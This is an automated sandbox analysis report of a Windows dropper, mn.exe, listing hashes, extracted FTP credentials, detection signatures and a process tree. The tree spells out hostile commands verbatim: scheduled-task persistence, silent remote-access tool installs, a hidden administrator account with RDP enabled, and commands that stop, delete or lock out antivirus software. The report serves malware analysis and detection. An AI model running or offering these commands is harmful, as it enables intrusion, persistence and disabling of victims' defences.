Analysis

  • max time kernel
    151s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    07-04-2021 07:39

General

  • Target

    mn.exe

  • Size

    11.9MB

  • MD5

    387139f87dc3b8dd527bf15b64abd197

  • SHA1

    65e227af49ed8a2015e9e9723507e261c9187e23

  • SHA256

    39e6a32ee280960f6e4e2d4e38fb25e96ae8f5bd163bafb8ffeab87e2216e639

  • SHA512

    3a9ba9a823f21f5d7620698ae6c96ff32c6646110a8fa1c652c3e1e39e59f58904244d65e5f9cd5da6e408f7515f9db62b2f13c16a8e54489fc88e0780c70ade

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    193.32.188.10
  • Port:
    21
  • Username:
    alex
  • Password:
    easypassword

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

  • UAC bypass 3 TTPs
  • Windows security bypass 2 TTPs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • ACProtect 1.3x - 1.4x DLL software 2 IoCs

    Detects file using ACProtect software.

  • Detected Stratum cryptominer command

    Looks to be attempting to contact Stratum mining pool.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • XMRig Miner Payload 1 IoCs
  • ASPack v2.12-2.42 9 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocks application from running via registry modification

    Adds application to list of disallowed applications.

  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 20 IoCs
  • Modifies Windows Firewall 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • Sets file to hidden 1 TTPs

    Modifies file attributes to stop it showing in Explorer etc.

  • Stops running service(s) 3 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 1 IoCs
  • Modifies file permissions 1 TTPs 56 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 7 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Program Files directory 26 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 5 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 3 IoCs
  • Modifies registry class 6 IoCs
  • NTFS ADS 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: LoadsDriver 3 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\mn.exe
    "C:\Users\Admin\AppData\Local\Temp\mn.exe"
    1⤵
    • Drops file in Drivers directory
    • Adds Run key to start application
    • Modifies WinLogon
    • Drops file in Program Files directory
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:896
    • C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 15
      2⤵
      • Creates scheduled task(s)
      PID:3208
    • C:\ProgramData\Microsoft\Intel\wini.exe
      C:\ProgramData\Microsoft\Intel\wini.exe -pnaxui
      2⤵
      • Executes dropped EXE
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2484
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\install.vbs"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2528
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Programdata\Windows\install.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2112
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg1.reg"
            5⤵
            • Runs .reg file with regedit
            PID:2232
          • C:\Windows\SysWOW64\regedit.exe
            regedit /s "reg2.reg"
            5⤵
            • Runs .reg file with regedit
            PID:3820
          • C:\Windows\SysWOW64\timeout.exe
            timeout 2
            5⤵
            • Delays execution with timeout.exe
            PID:3940
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /silentinstall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:1444
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /firewall
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of SetWindowsHookEx
            PID:1384
          • C:\ProgramData\Windows\rutserv.exe
            rutserv.exe /start
            5⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of SetWindowsHookEx
            PID:696
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows\*.*
            5⤵
            • Views/modifies file attributes
            PID:4296
          • C:\Windows\SysWOW64\attrib.exe
            ATTRIB +H +S C:\Programdata\Windows
            5⤵
            • Views/modifies file attributes
            PID:4808
          • C:\Windows\SysWOW64\sc.exe
            sc failure RManService reset= 0 actions= restart/1000/restart/1000/restart/1000
            5⤵
              PID:4452
            • C:\Windows\SysWOW64\sc.exe
              sc config RManService obj= LocalSystem type= interact type= own
              5⤵
                PID:5104
              • C:\Windows\SysWOW64\sc.exe
                sc config RManService DisplayName= "Microsoft Framework"
                5⤵
                  PID:4848
            • C:\ProgramData\Windows\winit.exe
              "C:\ProgramData\Windows\winit.exe"
              3⤵
              • Executes dropped EXE
              • Checks processor information in registry
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of SetWindowsHookEx
              PID:2180
              • C:\Program Files (x86)\Windows Mail\WinMail.exe
                "C:\Program Files (x86)\Windows Mail\WinMail" OCInstallUserConfigOE
                4⤵
                • Suspicious use of SetWindowsHookEx
                PID:4988
                • C:\Program Files\Windows Mail\WinMail.exe
                  "C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
                  5⤵
                  • Suspicious use of SetWindowsHookEx
                  PID:5080
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat
                4⤵
                  PID:4272
                  • C:\Windows\SysWOW64\timeout.exe
                    timeout 5
                    5⤵
                    • Delays execution with timeout.exe
                    PID:4260
            • C:\programdata\install\cheat.exe
              C:\programdata\install\cheat.exe -pnaxui
              2⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:576
              • C:\ProgramData\Microsoft\Intel\taskhost.exe
                "C:\ProgramData\Microsoft\Intel\taskhost.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:4012
                • C:\Programdata\RealtekHD\taskhostw.exe
                  C:\Programdata\RealtekHD\taskhostw.exe
                  4⤵
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious behavior: GetForegroundWindowSpam
                  • Suspicious use of SetWindowsHookEx
                  PID:4100
                • C:\ProgramData\Microsoft\Intel\R8.exe
                  C:\ProgramData\Microsoft\Intel\R8.exe
                  4⤵
                  • Executes dropped EXE
                  • Modifies registry class
                  • Suspicious use of SetWindowsHookEx
                  PID:4412
                  • C:\Windows\SysWOW64\WScript.exe
                    "C:\Windows\System32\WScript.exe" "C:\rdp\run.vbs"
                    5⤵
                      PID:4896
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c ""C:\rdp\pause.bat" "
                        6⤵
                        • Modifies registry class
                        PID:4844
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im Rar.exe
                          7⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4324
                        • C:\Windows\SysWOW64\taskkill.exe
                          taskkill /f /im Rar.exe
                          7⤵
                          • Kills process with taskkill
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4228
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout 3
                          7⤵
                          • Delays execution with timeout.exe
                          PID:5016
                        • C:\Windows\SysWOW64\chcp.com
                          chcp 1251
                          7⤵
                            PID:3276
                          • C:\rdp\Rar.exe
                            "Rar.exe" e -p555 db.rar
                            7⤵
                            • Executes dropped EXE
                            PID:5056
                          • C:\Windows\SysWOW64\taskkill.exe
                            taskkill /f /im Rar.exe
                            7⤵
                            • Kills process with taskkill
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1944
                          • C:\Windows\SysWOW64\timeout.exe
                            timeout 2
                            7⤵
                            • Delays execution with timeout.exe
                            PID:4660
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\rdp\install.vbs"
                            7⤵
                              PID:4700
                              • C:\Windows\SysWOW64\cmd.exe
                                C:\Windows\system32\cmd.exe /c ""C:\rdp\bat.bat" "
                                8⤵
                                  PID:4244
                                  • C:\Windows\SysWOW64\reg.exe
                                    reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
                                    9⤵
                                      PID:4224
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fAllowToGetHelp" /t REG_DWORD /d 1 /f
                                      9⤵
                                        PID:4392
                                      • C:\Windows\SysWOW64\netsh.exe
                                        netsh.exe advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow
                                        9⤵
                                          PID:2204
                                        • C:\Windows\SysWOW64\net.exe
                                          net.exe user "john" "12345" /add
                                          9⤵
                                            PID:4460
                                            • C:\Windows\SysWOW64\net1.exe
                                              C:\Windows\system32\net1 user "john" "12345" /add
                                              10⤵
                                                PID:3972
                                            • C:\Windows\SysWOW64\chcp.com
                                              chcp 1251
                                              9⤵
                                                PID:2192
                                              • C:\Windows\SysWOW64\net.exe
                                                net localgroup "Администраторы" "John" /add
                                                9⤵
                                                  PID:4872
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 localgroup "Администраторы" "John" /add
                                                    10⤵
                                                      PID:4204
                                                  • C:\Windows\SysWOW64\net.exe
                                                    net localgroup "Administratorzy" "John" /add
                                                    9⤵
                                                      PID:4220
                                                      • C:\Windows\SysWOW64\net1.exe
                                                        C:\Windows\system32\net1 localgroup "Administratorzy" "John" /add
                                                        10⤵
                                                          PID:1020
                                                      • C:\Windows\SysWOW64\net.exe
                                                        net localgroup "Administrators" John /add
                                                        9⤵
                                                          PID:4340
                                                          • C:\Windows\SysWOW64\net1.exe
                                                            C:\Windows\system32\net1 localgroup "Administrators" John /add
                                                            10⤵
                                                              PID:3960
                                                          • C:\Windows\SysWOW64\net.exe
                                                            net localgroup "Administradores" John /add
                                                            9⤵
                                                              PID:4252
                                                              • C:\Windows\SysWOW64\net1.exe
                                                                C:\Windows\system32\net1 localgroup "Administradores" John /add
                                                                10⤵
                                                                  PID:2924
                                                              • C:\Windows\SysWOW64\net.exe
                                                                net localgroup "Пользователи удаленного рабочего стола" John /add
                                                                9⤵
                                                                  PID:4928
                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                    C:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add
                                                                    10⤵
                                                                      PID:4976
                                                                  • C:\Windows\SysWOW64\net.exe
                                                                    net localgroup "Пользователи удаленного управления" John /add
                                                                    9⤵
                                                                      PID:4208
                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                        C:\Windows\system32\net1 localgroup "Пользователи удаленного управления" John /add
                                                                        10⤵
                                                                          PID:1664
                                                                      • C:\Windows\SysWOW64\net.exe
                                                                        net localgroup "Remote Desktop Users" John /add
                                                                        9⤵
                                                                          PID:3424
                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                            C:\Windows\system32\net1 localgroup "Remote Desktop Users" John /add
                                                                            10⤵
                                                                              PID:5044
                                                                          • C:\Windows\SysWOW64\net.exe
                                                                            net localgroup "Usuarios de escritorio remoto" John /add
                                                                            9⤵
                                                                              PID:2596
                                                                              • C:\Windows\SysWOW64\net1.exe
                                                                                C:\Windows\system32\net1 localgroup "Usuarios de escritorio remoto" John /add
                                                                                10⤵
                                                                                  PID:5008
                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                net localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                9⤵
                                                                                  PID:3428
                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                    C:\Windows\system32\net1 localgroup "Uzytkownicy pulpitu zdalnego" John /add
                                                                                    10⤵
                                                                                      PID:4536
                                                                                  • C:\rdp\RDPWInst.exe
                                                                                    "RDPWInst.exe" -i -o
                                                                                    9⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies WinLogon
                                                                                    • Drops file in Program Files directory
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:4492
                                                                                    • C:\Windows\SYSTEM32\netsh.exe
                                                                                      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                                                                                      10⤵
                                                                                        PID:3412
                                                                                    • C:\rdp\RDPWInst.exe
                                                                                      "RDPWInst.exe" -w
                                                                                      9⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5060
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "john" /t REG_DWORD /d 0 /f
                                                                                      9⤵
                                                                                        PID:4108
                                                                                      • C:\Windows\SysWOW64\net.exe
                                                                                        net accounts /maxpwage:unlimited
                                                                                        9⤵
                                                                                          PID:3676
                                                                                          • C:\Windows\SysWOW64\net1.exe
                                                                                            C:\Windows\system32\net1 accounts /maxpwage:unlimited
                                                                                            10⤵
                                                                                              PID:4676
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\Program Files\RDP Wrapper\*.*"
                                                                                            9⤵
                                                                                            • Drops file in Program Files directory
                                                                                            • Views/modifies file attributes
                                                                                            PID:4744
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\Program Files\RDP Wrapper"
                                                                                            9⤵
                                                                                            • Drops file in Program Files directory
                                                                                            • Views/modifies file attributes
                                                                                            PID:4728
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +s +h "C:\rdp"
                                                                                            9⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:4760
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout 2
                                                                                        7⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:5116
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat
                                                                                  4⤵
                                                                                  • Drops file in Drivers directory
                                                                                  PID:192
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDControl" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC MINUTE /MO 1 /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4696
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\RealtekHDStartUP" /TR "C:\Programdata\RealtekHD\taskhost.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:3268
                                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                                  "C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST
                                                                                  4⤵
                                                                                  • Creates scheduled task(s)
                                                                                  PID:4640
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c sc start appidsvc
                                                                              2⤵
                                                                              • Suspicious use of WriteProcessMemory
                                                                              PID:188
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc start appidsvc
                                                                                3⤵
                                                                                  PID:496
                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c sc start appmgmt
                                                                                2⤵
                                                                                • Suspicious use of WriteProcessMemory
                                                                                PID:4008
                                                                                • C:\Windows\SysWOW64\sc.exe
                                                                                  sc start appmgmt
                                                                                  3⤵
                                                                                    PID:3700
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c sc config appidsvc start= auto
                                                                                  2⤵
                                                                                  • Suspicious use of WriteProcessMemory
                                                                                  PID:508
                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                    sc config appidsvc start= auto
                                                                                    3⤵
                                                                                      PID:996
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c sc config appmgmt start= auto
                                                                                    2⤵
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:3476
                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                      sc config appmgmt start= auto
                                                                                      3⤵
                                                                                        PID:3892
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c sc delete swprv
                                                                                      2⤵
                                                                                      • Suspicious use of WriteProcessMemory
                                                                                      PID:3636
                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                        sc delete swprv
                                                                                        3⤵
                                                                                          PID:4084
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c sc stop mbamservice
                                                                                        2⤵
                                                                                          PID:2132
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc stop mbamservice
                                                                                            3⤵
                                                                                              PID:3008
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c sc stop bytefenceservice
                                                                                            2⤵
                                                                                              PID:1336
                                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                                sc stop bytefenceservice
                                                                                                3⤵
                                                                                                  PID:212
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                C:\Windows\system32\cmd.exe /c sc delete bytefenceservice
                                                                                                2⤵
                                                                                                  PID:3916
                                                                                                  • C:\Windows\SysWOW64\sc.exe
                                                                                                    sc delete bytefenceservice
                                                                                                    3⤵
                                                                                                      PID:3112
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c sc delete mbamservice
                                                                                                    2⤵
                                                                                                      PID:736
                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                        sc delete mbamservice
                                                                                                        3⤵
                                                                                                          PID:3648
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c sc delete crmsvc
                                                                                                        2⤵
                                                                                                          PID:2468
                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                            sc delete crmsvc
                                                                                                            3⤵
                                                                                                              PID:4352
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                            2⤵
                                                                                                              PID:3908
                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN
                                                                                                                3⤵
                                                                                                                  PID:4368
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                2⤵
                                                                                                                  PID:4168
                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                    netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN
                                                                                                                    3⤵
                                                                                                                      PID:4432
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                    2⤵
                                                                                                                      PID:4236
                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                        netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN
                                                                                                                        3⤵
                                                                                                                          PID:4652
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on
                                                                                                                        2⤵
                                                                                                                          PID:384
                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                            netsh advfirewall set allprofiles state on
                                                                                                                            3⤵
                                                                                                                              PID:4440
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                            2⤵
                                                                                                                              PID:4380
                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                3⤵
                                                                                                                                  PID:4780
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                2⤵
                                                                                                                                  PID:4476
                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                    icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                    3⤵
                                                                                                                                    • Modifies file permissions
                                                                                                                                    PID:4820
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                  2⤵
                                                                                                                                    PID:4512
                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                      icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                      3⤵
                                                                                                                                      • Modifies file permissions
                                                                                                                                      PID:4864
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                    2⤵
                                                                                                                                      PID:4620
                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                        icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                        3⤵
                                                                                                                                        • Modifies file permissions
                                                                                                                                        PID:4964
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                      2⤵
                                                                                                                                        PID:4672
                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                          icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                          3⤵
                                                                                                                                          • Modifies file permissions
                                                                                                                                          PID:5020
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                        2⤵
                                                                                                                                          PID:4632
                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                            3⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:4880
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                          2⤵
                                                                                                                                            PID:4792
                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                              icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                              3⤵
                                                                                                                                              • Modifies file permissions
                                                                                                                                              PID:5072
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                            2⤵
                                                                                                                                              PID:4908
                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                3⤵
                                                                                                                                                • Modifies file permissions
                                                                                                                                                PID:4448
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                              2⤵
                                                                                                                                                PID:5032
                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                  icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies file permissions
                                                                                                                                                  PID:5052
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                                2⤵
                                                                                                                                                  PID:1500
                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                    icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies file permissions
                                                                                                                                                    PID:5092
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                                  2⤵
                                                                                                                                                    PID:4152
                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                      icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies file permissions
                                                                                                                                                      PID:5024
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                    2⤵
                                                                                                                                                      PID:4180
                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                        icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies file permissions
                                                                                                                                                        PID:4516
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                      2⤵
                                                                                                                                                        PID:3540
                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                          icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies file permissions
                                                                                                                                                          PID:1000
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                        2⤵
                                                                                                                                                          PID:4376
                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                            icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies file permissions
                                                                                                                                                            PID:3816
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                          2⤵
                                                                                                                                                            PID:4528
                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                              icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies file permissions
                                                                                                                                                              PID:4804
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
